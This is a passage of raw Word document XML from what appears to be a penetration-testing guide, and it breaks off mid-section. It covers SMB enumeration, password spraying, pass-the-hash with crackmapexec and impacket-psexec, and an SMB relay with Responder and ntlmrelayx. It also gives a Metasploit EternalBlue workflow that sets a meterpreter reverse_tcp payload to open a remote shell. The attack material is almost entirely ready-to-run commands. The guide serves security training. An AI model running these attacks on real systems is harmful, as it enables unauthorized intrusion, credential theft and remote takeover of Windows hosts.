        <w:t xml:space="preserve"># Find SMB services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -p 445,139 --open 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Null session enumeration (no credentials)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient -L //192.168.1.10 -N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">enum4linux -a 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">crackmapexec smb 192.168.1.10 -u '' -p ''</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Authenticated enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">smbmap -H 192.168.1.10 -u username -p password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">crackmapexec smb 192.168.1.10 -u username -p password --shares</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">crackmapexec smb 192.168.1.10 -u username -p password --users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Password spraying (1 password, many users)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># EternalBlue (MS17-010) - Check if vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -p 445 --script smb-vuln-ms17-010 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Pass-the-Hash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">crackmapexec smb 192.168.1.10 -u admin -H [NTLM_HASH]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-psexec -hashes :NTLMHASH admin@192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB Relay Attack:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Step 1: Capture authentication with Responder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">responder -I eth0 -wrf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Step 2: Relay to target (in separate terminal)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-ntlmrelayx -tf targets.txt -smb2support</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">7.5 Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Metasploit Framework is the most widely used exploitation platform in the world. It's an open-source project maintained by Rapid7.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploits: Code that takes advantage of vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payloads: Code that runs on the target after exploitation (shells, Meterpreter)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Auxiliary: Scanning, fuzzing, and other non-exploit modules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Post: Post-exploitation modules (run after you have access)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Encoders: Obfuscate payloads to evade detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter: Advanced in-memory payload with rich features</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic Metasploit Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Start Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Search for exploits</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search ms17_010</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search type:exploit platform:windows smb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Use an exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Configure it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOSTS 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHOST 192.168.1.5      # Your IP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">set PAYLOAD windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p>
